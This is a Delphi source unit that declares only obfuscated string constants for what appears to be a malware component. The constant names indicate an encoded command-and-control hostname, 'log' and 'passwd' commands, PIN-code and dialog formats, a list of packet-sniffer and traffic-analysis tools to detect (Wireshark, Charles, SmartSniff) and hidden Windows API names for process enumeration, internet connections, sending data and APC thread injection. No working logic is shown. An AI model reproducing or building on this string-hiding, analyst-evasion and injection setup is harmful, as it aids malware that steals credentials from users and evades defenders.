unit commonDefs;

interface

const
	COMDEF_BASEID = '0092';
	COMDEF_HOSTNAME = '“œži[\•—…‚’—–”žiª®';
	
	COMDEF_COMMAND_LOG = '——';
	COMDEF_COMMAND_PASSWD = 'Z˜Š¡¢£‘';
	
	COMDEF_DIALOG_FORMAT = 'P›X• ’TQ‰–f—™¯¤œvc²b°¤©¢n[ªnZ®q»®ÀÅº®¯¨}f¹m°´Á˜}Ì„ÈÊÃxÃwºÀ¸’ÏŽÖÝÝÑæŸˆÄ‡ÙÊÓ×ß¸Ý¤òçæà°•Õ';
	COMDEF_PINCODE_FORMAT = 'P›X• ’TQ‰–f—™¯¤œvc²b°¤©¢n[ªnZ®q»®ÀÅº®¯¨}f¹m°´Á˜}Ì„ÏÅËxÃwÃÆÂºã¨Í”âÏÜÔÈ†Ê×Ðãéµžâ';
	
	COMDEF_INTERNET_AGENT = 'x—£—›˜ŽQXNQFO{Ž¨Ÿ§°±_Š‘Ri^dqWˆ§³¯­·Â~ƒ{r~`³¼uvˆ‹yÊÈÇÂršµ´ÁÆ';
	
	COMDEF_PROCNAME_WIRESHARK = '‚‘›“¢”Ž”ŽN†žŒ';
	COMDEF_PROCNAME_ANALYZER7 = 'sœžpšŽŽœš†˜z˜‰rfž¶¤';
	COMDEF_PROCNAME_CHARLES = 'nŠ ›‘ Pˆ˜†';
	COMDEF_PROCNAME_SMSNIFF = 'ž•œœ˜’“Pˆ˜†';
	COMDEF_PROCNAME_MESANAL = 'xœ¡“’c‘Ÿ¡‰—h °ž';
	COMDEF_PROCNAME_SMARTSNIFF = '~•Š £›‹‰†O‹Ÿ‰';
	COMDEF_PROCNAME_ANALYZER6 = 'sœžpšŽŽœš†˜z˜‰qfž¶¤';
	COMDEF_PROCNAME_NETTRAFVW = 'y¥žž˜v•‡Œ‡{£ ¯g£·¡';
	
	COMDEF_LIBRARY_KERNEL = 'v›œ”˜`TQ„’';
	COMDEF_LIBRARY_WININET = '‚‘——‘¡P‡Œ';
	COMDEF_LIBRARY_WINHTTP = '‚‘—–£ P‡Œ';
	COMDEF_LIBRARY_WINSOCK = '‚›[b^[†Œ';
	COMDEF_LIBRARY_NTDLL = '™œš›Z‘Ž';
	
	COMDEF_FUNCTION_CREATETLHELP32 = 'nšŽ£‘‘’Œ‰‹“”XlŽ¦š®²¤¬¦';
	COMDEF_FUNCTION_PROC32FIRST_ANSI = '{š˜‘”Ÿ UUfŠ˜š˜';
	COMDEF_FUNCTION_PROC32FIRST_UNI = '{š˜‘”Ÿ UUfŠ˜š˜|';
	COMDEF_FUNCTION_PROC32NEXT_ANSI = '{š˜‘”Ÿ UUn†ž›';
	COMDEF_FUNCTION_PROC32NEXT_UNI = '{š˜‘”Ÿ UUn†ž›{';
	COMDEF_FUNCTION_INETOPEN = 't–“¡š’–r†”h';
	COMDEF_FUNCTION_INETOPENURL = 't–“¡š’–r†”|–‘{';
	COMDEF_FUNCTION_INETREADFILE = 't–“¡š’–u…‚Šm‘Ÿ';
	COMDEF_FUNCTION_INETCLOSEHANDLE = 't–“¡š’–fŒ™Œl†¨Ÿ¤ž';
	COMDEF_FUNCTION_INETCREATEURL_ANSI = 't–“¡š’–f’†‡›‰z¬§y';
	COMDEF_FUNCTION_INETCREATEURL_UNI = 't–“¡š’–f’†‡›‰z¬§';
	COMDEF_FUNCTION_GETADDRINFO = '’“Ÿ‹‘†';
	COMDEF_FUNCTION_GETADDRINFO_UNI = 'ro“Ÿk‘†}';
	COMDEF_FUNCTION_GETADDRINFOEX_UNI = 'ro“Ÿk‘†kŸ{';
	COMDEF_FUNCTION_SEND = 'ž—’';
	COMDEF_FUNCTION_WINHTTPCREATEURL = '‚‘—v£ e•…‚šŒy—¦';
	COMDEF_NTFUNC_SETINFORMATIONFILE = '…Ÿ|“£u›ˆ’’Ž‡›”¨¡¥£';
	COMDEF_NTFUNC_QUEUEAPCTHREAD = 'yœz£”¡’c“ƒuŽ™‰†ž';

implementation

end.